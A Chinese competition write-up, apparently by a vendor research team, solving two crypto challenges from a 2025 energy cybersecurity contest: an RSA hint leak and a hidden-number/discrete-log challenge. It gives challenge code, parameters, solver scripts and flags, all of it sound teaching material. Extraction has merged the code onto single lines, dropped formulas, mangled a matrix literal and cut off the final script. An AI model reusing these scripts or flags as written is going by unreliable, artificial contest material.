2025年能源网络安全大赛团体预赛社会组Write up

admin
admin
admin
139250
文章
114
评论
2025年4月23日17:56:52评论0 views字数 42353阅读141分10秒阅读模式
2025年能源网络安全大赛团体预赛社会组Write up
2025年能源网络安全大赛团体预赛社会组Write up
共筑网安防线·共护能源安全
2025年能源网络安全大赛团体预赛社会组Write up

4月17日,2025年能源网络安全大赛团体预赛圆满落幕。作为网络安全领域的年度盛事,本次大赛吸引了众多技术精英的参与,赛题涵盖了从密码学、数据安全到Web安全等多个关键领域。山石网科安全技术研究院的两支参赛团队凭借扎实的技术功底和敏锐的解题思路,成功攻克了多个高难度赛题,成为社会组解题数最多的惨赛单位。今天,我们将为大家带来本次比赛的详细赛题解析,分享我们在比赛中的解题思路与技术细节,希望对大家有所帮助。

2025年能源网络安全大赛团体预赛社会组Write up
一、 Crypto

(一)
NumberTheory

2025年能源网络安全大赛团体预赛社会组Write up
题目源码:
from Crypto.Util.number import *import hintflag=b'xxx'e=65537p=getPrime(512)q=getPrime(512)n=p*qm=bytes_to_long(flag)c=pow(m,e,n)k=getPrime(1024)assert hint + 233 * k == 233 * k * pprint(n)print(c)print(hint)# 84099006955126261966925371456202769943592466221370095794235167154956697927281125181449320270460637820908574232493978429962263974458426503598700104493216727535451616752760724333653967152401716945549285008242019874215196489846481143398374860288545040874468108191037481101604627874268575884573685952474988256841# 28098063654079651384124474197746356824080585622155888018279898490747561415908220072536298610509681898119018709183606442183944207485940115624047842734359988590155403601250406116023121958193303908964857108526965815235457652033182982467968474248778435731228104089366239566977364311197776651102290796373095167764# 411245630228311610573345621334618725748702407327926883063919892785851166202383809662483938501531987094884084543300939673794551515912845363503988032311234800260819110323258416786417746444373651130257247926678135654564298408894174083333804257126735899220917359603430399033328133462456659839525671074605146583034398735379485362144932899212206419889556154825755723979850750847762362288223441051219637465296077020565435562941976546609555729574021362954126496825972439730
分析源码不难发现重点是assert语句,变式一下可以得到。 
利用费马小定理,对于任意整数,只要互质,就有。 
当指数是的倍数时,例如为整数)有:。 
因此,,而将是的倍数。计算即可得到,然后正常的解密RSA即可。
解题exp:
from random import randintfrom Cryptodome.Util.number import long_to_bytesfrom gmpy2 import gcd, inverte=65537n=84099006955126261966925371456202769943592466221370095794235167154956697927281125181449320270460637820908574232493978429962263974458426503598700104493216727535451616752760724333653967152401716945549285008242019874215196489846481143398374860288545040874468108191037481101604627874268575884573685952474988256841c=28098063654079651384124474197746356824080585622155888018279898490747561415908220072536298610509681898119018709183606442183944207485940115624047842734359988590155403601250406116023121958193303908964857108526965815235457652033182982467968474248778435731228104089366239566977364311197776651102290796373095167764hint=411245630228311610573345621334618725748702407327926883063919892785851166202383809662483938501531987094884084543300939673794551515912845363503988032311234800260819110323258416786417746444373651130257247926678135654564298408894174083333804257126735899220917359603430399033328133462456659839525671074605146583034398735379485362144932899212206419889556154825755723979850750847762362288223441051219637465296077020565435562941976546609555729574021362954126496825972439730a=2p = gcd(pow(a, hint, n)-1, n)q = n // pphi = (p-1) * (q-1)d = invert(e, phi)m = pow(c, d, n)print(long_to_bytes(m))#b'flag{a3878d9436b7c80e6ecfda33b7b0b840}'
(二)

easy_lwe

2025年能源网络安全大赛团体预赛社会组Write up
题目源码:
from Crypto.Util.number import *from secrets import flagassert len(flag) == 38p = getPrime(512)m = getPrime(512)while m > p:    m = getPrime(512)aa = []cc = []bb = []for i in range(30):    a = getPrime(512)    b = getPrime(400)    c = (a * m + b) % p    aa.append(a)    cc.append(c)    bb.append(b)enc = pow(m,flag,p)print(f'p = {p}')print(f'aa = {aa}')print(f'cc = {cc}')print(f'enc = {enc}')# p = 0x83b05d231fd40ff8ca26b4fb8136dc920754c14412960ce2ec700457861d48fe74f3958fc3a153f77a23fb850ecf0ac1e9722c71b6cc8a104b372cc17bf1528f# aa = [0xf53f440f2e76b60380e68e96508f5dd716b2c3df2ed8265ced83a93fd61a708eeff31fbee9efa22fa7b441cbc406c210de6273f81eb7d093561d5c6394ef2abd,0xe9ecbd5457dcf1bdbc1a852b625c7a8ae6f530e348c2dc0416afd6a375aeb06d4800cc6471ae7d29681715d0407aa8726c32cd35e54960f56b0d9b47a2eed9ed,0x86a261c1590a774ced6c7db439e53e4068a8dbc0ad111a0e0371e8731fb939a068348d035da04afb9a3914a011574e35cefc4d5c5740f7cbc27459d944f51d15,0xba99a871d8f805e3c0dcd4e04cee66ec5e213a7902a65f2faa8e86368e56c42d09fde536b07471fff8f72db922725a24d6288d1bfe9edc2cd76b756eb464e1eb,0xa99efeb79377db6baa8787b5d2d2ebf123d8ec77e820d1b88644883a07c38498aa08df82cb9802c7fa128a5fa08b66c56a0805f70a78b7cb45b1a74bde095165,0xe6341800304b0a6f2de941432bb253f53a3c73c7b0f0382fd1ec4c882da5fd1b5151c619f9279de3767ae03af387c495c50c8c0ff79fd6c8acb51bd0b16afc23,0xa8670f7142e5d90e781e335d5e870188b94288defd8302c1b183bf20b5a3720be1ae1afe0ad937bc4678727e1daf262194c430086f3810447dfce721c8fb36a5,0xe9d150d4e7a7f82e89d26fcaa003579c8dfc25f4a50794175ae0a4407dd33e87eb5fded328155009548c002d2a3198afa356e1692a6bb820d8ae71ca6e506b35,0xd7ec72dd643449f5d21a32a11e2458d292c524b91b4b1a8515a5f8351717813f51a55c5675aa0eaa5c80a32d26aa385d7425e7d3e1e50936b2744a1534e3c7b7,0xaf5d8062f6bc03875b5fb10d0888d586cb08fa62709910cd7d931201d4d833d31d935003b801cac4fd51ef1e4db3bc13e41d740d7881560c0942faf9acca55d5,0xf63c4a5add0474bf6c4fb6617a2965e2474a2902c59bcc4243d5dcffa0f1aa0a6136e9c9093ea05d84a26888aaad63ec652602200141abdfcdc0d1912d208dbb,0xd65c8ef9b01085819f2f5f2dfbb7641521966600ddd7a03b886320328144ec42ed5585206744c8e1b5beb5502aff6f0cd01934890926bbb5387363b321dbb6bd,0x9bd7a0e9d4940126c9668de7e29e198ac38010d505b90e92ee560307b8a134545bbd0277f14e7651e91c5a9362207097e17888b9a49a889c672f76681f41962f,0xff387c4e94f47cba242936e80d620d3eeb203a1c7f365ae178b33b29ff3d8c2f932733d0605876c23942bae7f096b3ee457d02758796bda01bbcd3bd2e1229a1,0xbd6c24205cf5b9b2acc909296369ca77ef34ceac5f9900742a7ec37c00b94a56418d168d576d33383d9f782386524c4cecebc3a9fa68c81a5a6867de564d07e3,0x8850ac2051b6a7450f228e676abbfd510ce08a43a0b791182aedcfb6b3f1d478e3dc953e59eb99fe370f71d52af3a1625e0700078927f8a5919becbfa60af96b,0xfa474444b5372681c5b7316871cf9a93306b4d6a3eac2492c71780eb6903bd4ff77b1c4a28608dfa10c0c8b8bfc23942fc0a8ec64d3967504621e692eafcf4af,0xfd7f772c719929d33f15ce0122f6efc278b728d75dbd16a343c649e49118a79084d169d6db1b6b859e1f4c82694a850622dcdff23c8fbd7d0a736a409b94f471,0xedf6566ecd7f0a0beaa2f45a2a509358c9537dbf772e6f63ccb0e21b5c5c3dae0939e9e15c9bcdf80f7875e74ebfba16f0660737719c8ad435981b5b8df89a23,0xd7e718dafb753084cb7c1deee139f6e158a0228bbf9b0ae5ed3a8b3d2508ce62e4e32cd43a3135540b31e052e6e3a0dba3ae623c69d74da34387c3429b6f0487,0xbff5ab718c54909a34ba8ab5787cbfb0c9c57394350b71744d5751f577cefda87cc8263b21dd2c21a8f19fff8362c3371fcb054dddb1293df7d6efe2d661e4ab,0xb946ad47cf1f9186c1eeaeed12f21b41a29f9fb74b14f577c97731004b372c5f41023aafc9b93557c984ff87dd263b293aa500c3a2ce1f0815319263cf7c42d5,0x9b93853dc5f4c052fdda339f69c625bc98ffdbde439078458b84278e34542f9110863e5beef166a766f565f7a815ec4a462510b42f81454b65e648622c610b27,0xae050aaa86b9580747efa33561973597d7d7a0684a45219eed3224ebc37fdf067ed61a29ecaa501266c9bcdd16b850c0dd40da3f964a5b03ae60c3967fd55913,0xea57b0482a876d49a3e21bb885bda0aae21f5fcf2521f7e1db771998b6b639d0833c17d7c8c67c12ce9b60e4210e068f98344a8cabc5faa17a048100bab797bb,0x9f866ad27c9ea2fb29168ec6db0f7755221484d0c89bfef0cd70fc2ed14fda15f7b59bbca2e23f40b5effeb9e53ad821e06cf986b34da4407c85bfbf78d2920b,0xab0939605dcff5d1ec8405b6daeb65eccc6e3b5956601dddea95c6310ac32bfeec1bab6b83e85371078a16ea9489050175098d39488aaed2a190c647fe2b1b69,0xe85698e04d8bedbac2c7884c914b7026dbb1dd5134c4a5a8e7541b07c8a94ab3d2f12eb7f1171ccd564054e1dc63d5ac044e5c5552870b419fef35a572199239,0xea94663e103e4354fb7feb80b11d06c7e16feb7265f69ee882180baba70fa075df24e3fe1ad12a99f054cabf4a3f5e4823416d4c4daa02ca51ce3926034186db,0x93662718294005f4ac8f79b0799e240a05eea871ef07d623ea7c68ef818b3b55fb4f9b6f06c399726e59cec03389053b448f187404cddb93cb3c55e3d12cebc9]# cc = [0x4aae29aaaab89fbc672db400c41d1ad3ffce937e7810065bed552c12101fb778046d22b00c05bbc3f61825b5af3c3e57f1abaafe3d9a58a573a905e2a1cecde7,0x502a1c23ef44f174aaedb9a49705eb72f805bab13e82d599525ea7484cc11f2e7c4475526b4be344390e46bcb8bcdaba2768c6321f8ca5482666171eee498f28,0x546f2276b59b7186ef5b9a04e0ba2691648d005fc780303411a1082ea3b05be127a10e26921a4b84b14d8acc45a6c32a0142ac6eb396415ecb5841a01b775b5d,0x43986eb7208b66dd86c12f953e10b2d3907873151170278393b6a4f7ea518ab5745e2db5f4dbec84087c4817c5df10e743f35ed1190515aba34832b1b274bf2e,0x7b2e448342bc7409ed891cdbf5137014f417866097297302085d8800458495e374fba8398d069f1c1c7792a9f03194e36921c378308de18313fb9b62db45cc0a,0x41ac8f265bc96ae868256fb08caf0a43a547346522b5d90cb9489c87cd5d726447d20354332dd3cb771003eddfa9c4bfa6923ae45ac8c0994f7cce46a3302eea,0x51b59ad39b388fdb2056279e2de02d32d36b52da1cc1fe4f6843964273b4585704e21405e2528e5894bd4fdb436c382a5f7d3849f9c5d7902be74edd2b16a31c,0x4e52d207f16a6f42497b25600e039de3ce49d7945ac2201ac12bf9fa9b3dc136f35328cbe9d3f9d4204d90f29fe1ce209c8904c99de0f85c5c572d05609095a6,0x6485f505cd8296e9f1c9abdc39eebc6e767e98e1587b18878fa8a582a012bb609c2f36daffc2b9c460514bc47533525ce6835e7f8123331a833958fa47f2e40,0x1ff809e71ab0347a8a9ec4356d5b8fbf109ade5881e5b59ac14adaaef2034fc40880e495070442513f42434fa8cbfcd9bce0501574997b35939f201ba1c87872,0x5b3fad73b402fcc1148758d80a61f637257d35f2773c8dc9f22859a01aecaa37a37858232ab5b3e3622f234bf35bb02a6e93ecd5a06182b61e583d0193afaf55,0x640e3556a526209f8528fbe678da3914d912a7e701abc3d4fcd65d84bcdbfc22623dfa3db31f9585a615c6de869b39c040dbfe94bb7eafd91bde15c4b87bd2c0,0x335b0ff42f39541539752faade7510a301a861720d85958ce2890ddca9e0693b342604a5b134a0974ea21dc0dc0a156c01159898e5f87e16b4a56121c2e3bbb5,0x89621740ec8b81065457105685666dfe6e31ee4f0a6efa6901e20ad6e5ea19ba438ea92f632764e52ccfb1ed35639443b5536f19ca69e9c295c6f5287a5e31b,0x1e4162060327045be0f5a0ae5d7b87c60b928e4669450339af64a39ae45b108eb58bbe83e15bef7a5c92243b213adc3e9d3514632249314bf5b588df6202ae10,0x5d10e308a16f8cd5c53b3ecd1081624e6eed4c3bfe522a8b7daf301aa6fc370b0a1cff1db7ea27aa6f5200903b365c53bc6d890ca1167ca57de87f80c5321742,0x434ac82b1ed073a1d73606ffe973e316768368fb522644f6cc76d2a0e6b83f533524c7589113aeb2db35d50c2f9ff64ceb27958a93d47b6875b8eb9b158ebaac,0x7cf3028273ece2a8af9790d3a689875bf7a3894e351a639d88fa13de05dc7f18be20ddeef4414a31b0f3dd65291e5d4d47d098027dbec25d4bc5409c017f0b03,0x5d0eefe7de32360d7950d96d821ce06741b737a1dca016cb003f75e380f5c8e3d9b8505b0eda21b36879a6455d1f640bdac5ad648b97d80eacf406b57bb1d692,0x4e4c6156da7f71123e1b4efde4a436985c6f2cccdc9b182735a75153927c6e7dc94693ab7fdd8646821a9d42eeb76c1be54984f81296a10e689805975185bf2c,0x68db6b837d968569ba944591efb36587f0022b05cefbedaad1e1d7652d0c233d1c0b036364f25e0865c7a1dab8d9d1081f23928a3573b5ec711e5b7f32714a4,0x333db46bc5fb83cbbf68475fd612bcad6becd30f95bf5b9ab6058ed0777fcb78cfe6da5c3386799fe9a1d6616801154ae7f45e35612de08efed7e2e750088b8e,0x70d4dc8986c228e12329af934c08f7c0ca94ce6913b5c641c59b3cf629a1957f82d4f40aaa7faa765c75e4f994a8222a4d08e045fb529da5ee277e1b9540c148,0x20421569b3bc73da4505760f7798a504f2276e6df9c9e48320b23201fb682021d168f6ee657fc2080722eb576ac78bf4b63ad7419983a05196fa0724fc4886d,0x5f523df584f43d7eff229d562793c8e5d4713d9c80bd40b95434c34c982324f7c282ac2fe3ac151cb62435b85bece2ef115c6f4b7a33d47dcbfa8360f89b91ac,0x7cbedea149640064a93cb75b909804ee7a896e17da808579206d1db7523b98bdf15bdc70e267e0a201bf293f980c1b5304337a7a78cc655aca07b9818b7169ab,0x62b34eaac3d3a2b360805cc23147ff8754a9d90788461107a5c8cc7053a0910ca7af45035d333c9a0b7cf6a2c13c9c367ad8eea0ccda2a6d8e089b5ee07a76ef,0x3e1c31f988e238869fad4794beb32164fa3bf3880041d1f9f2a65e2679f951491fcbeff1aa067313bf02100ae15d1af4d87050db05cec934e077c3eec238b72,0x3c056ad33432e1cf5548ae3a6db21ee1471eb70619e0ad542bd38dd80f37b76b571ae6469bacd33f9618b7a61b8e8424fc33cae479375df72b064a5d1b8cd90f,0x4caf081f5b949e65115e18b613ad8dc1fc208d2c5bea710b27b1db11d4a7eecc455c13f2fd92481f8cfea3e6fa75c0a58a154f12b6ce92c66107f617fd7ed7d8]# enc = 0x191eb43459bd0f2d5ece00ab52c612668bb4c161014641a6e4afb41020465d7b82e9b60a55ab831bb5695f2fd832d08258c752ebf27ba0374b7b11b001b2629a
首先这题分两部分来看。分别是第一部分的HNP问题和第二部分的DLP问题,接下来我们分别分析
HNP

HNP,即the Hidden Number Problem,隐藏数问题。本题中的是LHNP,即线性隐藏数问题。定义是从形如

的一组方程组恢

将单个方程可以转化为

我们可以构造出矩阵:

2025年能源网络安全大赛团体预赛社会组Write up
其中的上界,为常系数。我们进行LLL算法即可得到该向量,并从中还原
from Crypto.Util.number import *p= 0x83b05d231fd40ff8ca26b4fb8136dc920754c14412960ce2ec700457861d48fe74f3958fc3a153f77a23fb850ecf0ac1e9722c71b6cc8a104b372cc17bf1528frs =[0xf53f440f2e76b60380e68e96508f5dd716b2c3df2ed8265ced83a93fd61a708eeff31fbee9efa22fa7b441cbc406c210de6273f81eb7d093561d5c6394ef2abd,0xe9ecbd5457dcf1bdbc1a852b625c7a8ae6f530e348c2dc0416afd6a375aeb06d4800cc6471ae7d29681715d0407aa8726c32cd35e54960f56b0d9b47a2eed9ed,0x86a261c1590a774ced6c7db439e53e4068a8dbc0ad111a0e0371e8731fb939a068348d035da04afb9a3914a011574e35cefc4d5c5740f7cbc27459d944f51d15,0xba99a871d8f805e3c0dcd4e04cee66ec5e213a7902a65f2faa8e86368e56c42d09fde536b07471fff8f72db922725a24d6288d1bfe9edc2cd76b756eb464e1eb,0xa99efeb79377db6baa8787b5d2d2ebf123d8ec77e820d1b88644883a07c38498aa08df82cb9802c7fa128a5fa08b66c56a0805f70a78b7cb45b1a74bde095165,0xe6341800304b0a6f2de941432bb253f53a3c73c7b0f0382fd1ec4c882da5fd1b5151c619f9279de3767ae03af387c495c50c8c0ff79fd6c8acb51bd0b16afc23,0xa8670f7142e5d90e781e335d5e870188b94288defd8302c1b183bf20b5a3720be1ae1afe0ad937bc4678727e1daf262194c430086f3810447dfce721c8fb36a5,0xe9d150d4e7a7f82e89d26fcaa003579c8dfc25f4a50794175ae0a4407dd33e87eb5fded328155009548c002d2a3198afa356e1692a6bb820d8ae71ca6e506b35,0xd7ec72dd643449f5d21a32a11e2458d292c524b91b4b1a8515a5f8351717813f51a55c5675aa0eaa5c80a32d26aa385d7425e7d3e1e50936b2744a1534e3c7b7,0xaf5d8062f6bc03875b5fb10d0888d586cb08fa62709910cd7d931201d4d833d31d935003b801cac4fd51ef1e4db3bc13e41d740d7881560c0942faf9acca55d5,0xf63c4a5add0474bf6c4fb6617a2965e2474a2902c59bcc4243d5dcffa0f1aa0a6136e9c9093ea05d84a26888aaad63ec652602200141abdfcdc0d1912d208dbb,0xd65c8ef9b01085819f2f5f2dfbb7641521966600ddd7a03b886320328144ec42ed5585206744c8e1b5beb5502aff6f0cd01934890926bbb5387363b321dbb6bd,0x9bd7a0e9d4940126c9668de7e29e198ac38010d505b90e92ee560307b8a134545bbd0277f14e7651e91c5a9362207097e17888b9a49a889c672f76681f41962f,0xff387c4e94f47cba242936e80d620d3eeb203a1c7f365ae178b33b29ff3d8c2f932733d0605876c23942bae7f096b3ee457d02758796bda01bbcd3bd2e1229a1,0xbd6c24205cf5b9b2acc909296369ca77ef34ceac5f9900742a7ec37c00b94a56418d168d576d33383d9f782386524c4cecebc3a9fa68c81a5a6867de564d07e3,0x8850ac2051b6a7450f228e676abbfd510ce08a43a0b791182aedcfb6b3f1d478e3dc953e59eb99fe370f71d52af3a1625e0700078927f8a5919becbfa60af96b,0xfa474444b5372681c5b7316871cf9a93306b4d6a3eac2492c71780eb6903bd4ff77b1c4a28608dfa10c0c8b8bfc23942fc0a8ec64d3967504621e692eafcf4af,0xfd7f772c719929d33f15ce0122f6efc278b728d75dbd16a343c649e49118a79084d169d6db1b6b859e1f4c82694a850622dcdff23c8fbd7d0a736a409b94f471,0xedf6566ecd7f0a0beaa2f45a2a509358c9537dbf772e6f63ccb0e21b5c5c3dae0939e9e15c9bcdf80f7875e74ebfba16f0660737719c8ad435981b5b8df89a23,0xd7e718dafb753084cb7c1deee139f6e158a0228bbf9b0ae5ed3a8b3d2508ce62e4e32cd43a3135540b31e052e6e3a0dba3ae623c69d74da34387c3429b6f0487,0xbff5ab718c54909a34ba8ab5787cbfb0c9c57394350b71744d5751f577cefda87cc8263b21dd2c21a8f19fff8362c3371fcb054dddb1293df7d6efe2d661e4ab,0xb946ad47cf1f9186c1eeaeed12f21b41a29f9fb74b14f577c97731004b372c5f41023aafc9b93557c984ff87dd263b293aa500c3a2ce1f0815319263cf7c42d5,0x9b93853dc5f4c052fdda339f69c625bc98ffdbde439078458b84278e34542f9110863e5beef166a766f565f7a815ec4a462510b42f81454b65e648622c610b27,0xae050aaa86b9580747efa33561973597d7d7a0684a45219eed3224ebc37fdf067ed61a29ecaa501266c9bcdd16b850c0dd40da3f964a5b03ae60c3967fd55913,0xea57b0482a876d49a3e21bb885bda0aae21f5fcf2521f7e1db771998b6b639d0833c17d7c8c67c12ce9b60e4210e068f98344a8cabc5faa17a048100bab797bb,0x9f866ad27c9ea2fb29168ec6db0f7755221484d0c89bfef0cd70fc2ed14fda15f7b59bbca2e23f40b5effeb9e53ad821e06cf986b34da4407c85bfbf78d2920b,0xab0939605dcff5d1ec8405b6daeb65eccc6e3b5956601dddea95c6310ac32bfeec1bab6b83e85371078a16ea9489050175098d39488aaed2a190c647fe2b1b69,0xe85698e04d8bedbac2c7884c914b7026dbb1dd5134c4a5a8e7541b07c8a94ab3d2f12eb7f1171ccd564054e1dc63d5ac044e5c5552870b419fef35a572199239,0xea94663e103e4354fb7feb80b11d06c7e16feb7265f69ee882180baba70fa075df24e3fe1ad12a99f054cabf4a3f5e4823416d4c4daa02ca51ce3926034186db,0x93662718294005f4ac8f79b0799e240a05eea871ef07d623ea7c68ef818b3b55fb4f9b6f06c399726e59cec03389053b448f187404cddb93cb3c55e3d12cebc9]cs =[0x4aae29aaaab89fbc672db400c41d1ad3ffce937e7810065bed552c12101fb778046d22b00c05bbc3f61825b5af3c3e57f1abaafe3d9a58a573a905e2a1cecde7,0x502a1c23ef44f174aaedb9a49705eb72f805bab13e82d599525ea7484cc11f2e7c4475526b4be344390e46bcb8bcdaba2768c6321f8ca5482666171eee498f28,0x546f2276b59b7186ef5b9a04e0ba2691648d005fc780303411a1082ea3b05be127a10e26921a4b84b14d8acc45a6c32a0142ac6eb396415ecb5841a01b775b5d,0x43986eb7208b66dd86c12f953e10b2d3907873151170278393b6a4f7ea518ab5745e2db5f4dbec84087c4817c5df10e743f35ed1190515aba34832b1b274bf2e,0x7b2e448342bc7409ed891cdbf5137014f417866097297302085d8800458495e374fba8398d069f1c1c7792a9f03194e36921c378308de18313fb9b62db45cc0a,0x41ac8f265bc96ae868256fb08caf0a43a547346522b5d90cb9489c87cd5d726447d20354332dd3cb771003eddfa9c4bfa6923ae45ac8c0994f7cce46a3302eea,0x51b59ad39b388fdb2056279e2de02d32d36b52da1cc1fe4f6843964273b4585704e21405e2528e5894bd4fdb436c382a5f7d3849f9c5d7902be74edd2b16a31c,0x4e52d207f16a6f42497b25600e039de3ce49d7945ac2201ac12bf9fa9b3dc136f35328cbe9d3f9d4204d90f29fe1ce209c8904c99de0f85c5c572d05609095a6,0x6485f505cd8296e9f1c9abdc39eebc6e767e98e1587b18878fa8a582a012bb609c2f36daffc2b9c460514bc47533525ce6835e7f8123331a833958fa47f2e40,0x1ff809e71ab0347a8a9ec4356d5b8fbf109ade5881e5b59ac14adaaef2034fc40880e495070442513f42434fa8cbfcd9bce0501574997b35939f201ba1c87872,0x5b3fad73b402fcc1148758d80a61f637257d35f2773c8dc9f22859a01aecaa37a37858232ab5b3e3622f234bf35bb02a6e93ecd5a06182b61e583d0193afaf55,0x640e3556a526209f8528fbe678da3914d912a7e701abc3d4fcd65d84bcdbfc22623dfa3db31f9585a615c6de869b39c040dbfe94bb7eafd91bde15c4b87bd2c0,0x335b0ff42f39541539752faade7510a301a861720d85958ce2890ddca9e0693b342604a5b134a0974ea21dc0dc0a156c01159898e5f87e16b4a56121c2e3bbb5,0x89621740ec8b81065457105685666dfe6e31ee4f0a6efa6901e20ad6e5ea19ba438ea92f632764e52ccfb1ed35639443b5536f19ca69e9c295c6f5287a5e31b,0x1e4162060327045be0f5a0ae5d7b87c60b928e4669450339af64a39ae45b108eb58bbe83e15bef7a5c92243b213adc3e9d3514632249314bf5b588df6202ae10,0x5d10e308a16f8cd5c53b3ecd1081624e6eed4c3bfe522a8b7daf301aa6fc370b0a1cff1db7ea27aa6f5200903b365c53bc6d890ca1167ca57de87f80c5321742,0x434ac82b1ed073a1d73606ffe973e316768368fb522644f6cc76d2a0e6b83f533524c7589113aeb2db35d50c2f9ff64ceb27958a93d47b6875b8eb9b158ebaac,0x7cf3028273ece2a8af9790d3a689875bf7a3894e351a639d88fa13de05dc7f18be20ddeef4414a31b0f3dd65291e5d4d47d098027dbec25d4bc5409c017f0b03,0x5d0eefe7de32360d7950d96d821ce06741b737a1dca016cb003f75e380f5c8e3d9b8505b0eda21b36879a6455d1f640bdac5ad648b97d80eacf406b57bb1d692,0x4e4c6156da7f71123e1b4efde4a436985c6f2cccdc9b182735a75153927c6e7dc94693ab7fdd8646821a9d42eeb76c1be54984f81296a10e689805975185bf2c,0x68db6b837d968569ba944591efb36587f0022b05cefbedaad1e1d7652d0c233d1c0b036364f25e0865c7a1dab8d9d1081f23928a3573b5ec711e5b7f32714a4,0x333db46bc5fb83cbbf68475fd612bcad6becd30f95bf5b9ab6058ed0777fcb78cfe6da5c3386799fe9a1d6616801154ae7f45e35612de08efed7e2e750088b8e,0x70d4dc8986c228e12329af934c08f7c0ca94ce6913b5c641c59b3cf629a1957f82d4f40aaa7faa765c75e4f994a8222a4d08e045fb529da5ee277e1b9540c148,0x20421569b3bc73da4505760f7798a504f2276e6df9c9e48320b23201fb682021d168f6ee657fc2080722eb576ac78bf4b63ad7419983a05196fa0724fc4886d,0x5f523df584f43d7eff229d562793c8e5d4713d9c80bd40b95434c34c982324f7c282ac2fe3ac151cb62435b85bece2ef115c6f4b7a33d47dcbfa8360f89b91ac,0x7cbedea149640064a93cb75b909804ee7a896e17da808579206d1db7523b98bdf15bdc70e267e0a201bf293f980c1b5304337a7a78cc655aca07b9818b7169ab,0x62b34eaac3d3a2b360805cc23147ff8754a9d90788461107a5c8cc7053a0910ca7af45035d333c9a0b7cf6a2c13c9c367ad8eea0ccda2a6d8e089b5ee07a76ef,0x3e1c31f988e238869fad4794beb32164fa3bf3880041d1f9f2a65e2679f951491fcbeff1aa067313bf02100ae15d1af4d87050db05cec934e077c3eec238b72,0x3c056ad33432e1cf5548ae3a6db21ee1471eb70619e0ad542bd38dd80f37b76b571ae6469bacd33f9618b7a61b8e8424fc33cae479375df72b064a5d1b8cd90f,0x4caf081f5b949e65115e18b613ad8dc1fc208d2c5bea710b27b1db11d4a7eecc455c13f2fd92481f8cfea3e6fa75c0a58a154f12b6ce92c66107f617fd7ed7d8]enc=0x191eb43459bd0f2d5ece00ab52c612668bb4c161014641a6e4afb41020465d7b82e9b60a55ab831bb5695f2fd832d08258c752ebf27ba0374b7b11b001b2629at = len(rs)kbits = 400K = 2 ** kbitsP = identity_matrix(t) * pRC = matrix([[-10], [01]]) * matrix([rs, cs])KP = matrix([[K / p, 0], [0, K]])M = block_matrix([[P, 0], [RC, KP]], subdivide=False)shortest_vector = M.LLL()x = shortest_vector[1-2] / K * p % pprint(x)#x=6789891305297779556556571922812978922375073901749764215969003309869718878076269545304055843125301553103531252334876560433405451108895206969904268456786139
DLP
DLP(离散对数问题),由很多算法求解,对于本题。经过检测我们发现有很多小因子,因此我们可以认为是光滑的,那么就适用于Pohlig-Hellman算法进行求解,对于的最后一个大素数因子,我们采用爆破的方法求解最后几位。
G=GF(p)factors, exps = zip(*factor(p - 1))primes = [factors[i] ^ exps[i] for i in range(len(factors))]print(primes)dlogs = []for fac in primes[:-1]:    t = (p - 1) // fac    dlog = discrete_log(G(pow(enc, t, p)), G(pow(x, t, p)))    dlogs += [dlog]s = (p - 1) // primes[-1]print(s)res = crt(dlogs, primes[:-1])for i in range(100):if b'flag{'in long_to_bytes(res + i * s):        print(long_to_bytes(res + i * s))break
解题exp:
from Crypto.Util.number import *p= 0x83b05d231fd40ff8ca26b4fb8136dc920754c14412960ce2ec700457861d48fe74f3958fc3a153f77a23fb850ecf0ac1e9722c71b6cc8a104b372cc17bf1528frs =[0xf53f440f2e76b60380e68e96508f5dd716b2c3df2ed8265ced83a93fd61a708eeff31fbee9efa22fa7b441cbc406c210de6273f81eb7d093561d5c6394ef2abd,0xe9ecbd5457dcf1bdbc1a852b625c7a8ae6f530e348c2dc0416afd6a375aeb06d4800cc6471ae7d29681715d0407aa8726c32cd35e54960f56b0d9b47a2eed9ed,0x86a261c1590a774ced6c7db439e53e4068a8dbc0ad111a0e0371e8731fb939a068348d035da04afb9a3914a011574e35cefc4d5c5740f7cbc27459d944f51d15,0xba99a871d8f805e3c0dcd4e04cee66ec5e213a7902a65f2faa8e86368e56c42d09fde536b07471fff8f72db922725a24d6288d1bfe9edc2cd76b756eb464e1eb,0xa99efeb79377db6baa8787b5d2d2ebf123d8ec77e820d1b88644883a07c38498aa08df82cb9802c7fa128a5fa08b66c56a0805f70a78b7cb45b1a74bde095165,0xe6341800304b0a6f2de941432bb253f53a3c73c7b0f0382fd1ec4c882da5fd1b5151c619f9279de3767ae03af387c495c50c8c0ff79fd6c8acb51bd0b16afc23,0xa8670f7142e5d90e781e335d5e870188b94288defd8302c1b183bf20b5a3720be1ae1afe0ad937bc4678727e1daf262194c430086f3810447dfce721c8fb36a5,0xe9d150d4e7a7f82e89d26fcaa003579c8dfc25f4a50794175ae0a4407dd33e87eb5fded328155009548c002d2a3198afa356e1692a6bb820d8ae71ca6e506b35,0xd7ec72dd643449f5d21a32a11e2458d292c524b91b4b1a8515a5f8351717813f51a55c5675aa0eaa5c80a32d26aa385d7425e7d3e1e50936b2744a1534e3c7b7,0xaf5d8062f6bc03875b5fb10d0888d586cb08fa62709910cd7d931201d4d833d31d935003b801cac4fd51ef1e4db3bc13e41d740d7881560c0942faf9acca55d5,0xf63c4a5add0474bf6c4fb6617a2965e2474a2902c59bcc4243d5dcffa0f1aa0a6136e9c9093ea05d84a26888aaad63ec652602200141abdfcdc0d1912d208dbb,0xd65c8ef9b01085819f2f5f2dfbb7641521966600ddd7a03b886320328144ec42ed5585206744c8e1b5beb5502aff6f0cd01934890926bbb5387363b321dbb6bd,0x9bd7a0e9d4940126c9668de7e29e198ac38010d505b90e92ee560307b8a134545bbd0277f14e7651e91c5a9362207097e17888b9a49a889c672f76681f41962f,0xff387c4e94f47cba242936e80d620d3eeb203a1c7f365ae178b33b29ff3d8c2f932733d0605876c23942bae7f096b3ee457d02758796bda01bbcd3bd2e1229a1,0xbd6c24205cf5b9b2acc909296369ca77ef34ceac5f9900742a7ec37c00b94a56418d168d576d33383d9f782386524c4cecebc3a9fa68c81a5a6867de564d07e3,0x8850ac2051b6a7450f228e676abbfd510ce08a43a0b791182aedcfb6b3f1d478e3dc953e59eb99fe370f71d52af3a1625e0700078927f8a5919becbfa60af96b,0xfa474444b5372681c5b7316871cf9a93306b4d6a3eac2492c71780eb6903bd4ff77b1c4a28608dfa10c0c8b8bfc23942fc0a8ec64d3967504621e692eafcf4af,0xfd7f772c719929d33f15ce0122f6efc278b728d75dbd16a343c649e49118a79084d169d6db1b6b859e1f4c82694a850622dcdff23c8fbd7d0a736a409b94f471,0xedf6566ecd7f0a0beaa2f45a2a509358c9537dbf772e6f63ccb0e21b5c5c3dae0939e9e15c9bcdf80f7875e74ebfba16f0660737719c8ad435981b5b8df89a23,0xd7e718da